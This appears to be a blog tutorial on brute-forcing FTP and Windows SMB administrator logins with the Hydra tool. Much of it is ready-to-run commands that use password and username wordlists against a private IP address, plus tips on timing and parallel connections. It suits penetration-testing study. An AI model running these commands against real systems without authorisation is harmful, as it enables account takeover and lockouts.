hydra -l administrator -p password 192.168.0.1 ftp
However this isn't much fun, not to mention time consuming. Who wants to re-issue the following command over and over again manually.
Instead you can utilize a text file and store passwords you want to try. Hydra can pump through a large text file in minutes.
The easiest switches to remember are -l / -L and -p / -P
Small case switches 'l/p' specify a single set of login credentials at the command line and upper case switches 'L/P' inform Hydra to look in a text file for both the user name and password. Let's say we had a text file with 100,000 words, and we wanted to brute force the Administrator account. We would issue the following command.
hydra -l administrator -P /path/to/file/passwords.txt 192.168.0.1 ftp
What if you want to try different user names, how would that look like?
hydra -L /path/to/file/usernames.txt -P /path/to/file/passwords.txt 192.168.0.1 ftp
If you're brute forcing a remote host on the Internet you could specify a wait period with '-w' switch. On the flip side if you want to see each try on screen, ask Hydra to be verbose with '-v'.
Above example is brute forcing an FTP server. How about a Windows target? Windows authentication is handled by the SMB service. Our new command line would look like this;
hydra -l administrator -P /path/to/file/passwords.txt 192.168.0.1 smb
Before you go crazy, a word of warning and some items to remember:1. Accounts other than Administrator can be locked out. However Administrator can be locked out in special circumstances. Be careful!2. If you don't specify a domain you're brute forcing the local administrator account. 3. Hydra by default attempts 16 parallel connections. This may be too much for some hosts. Adjust this setting with '-t'. For example limiting Hydra to a single connection like this;.
hydra -l administrator -P /path/to/file/passwords.txt -t 1 192.168.0.1 smb
Hydra is easy to use. Above examples should get you started. Next week I'll show you Medusa. Cheers
~Tom
For more information - please visit our blog at: www.digitalboundary.net/wp
Comments powered by CComment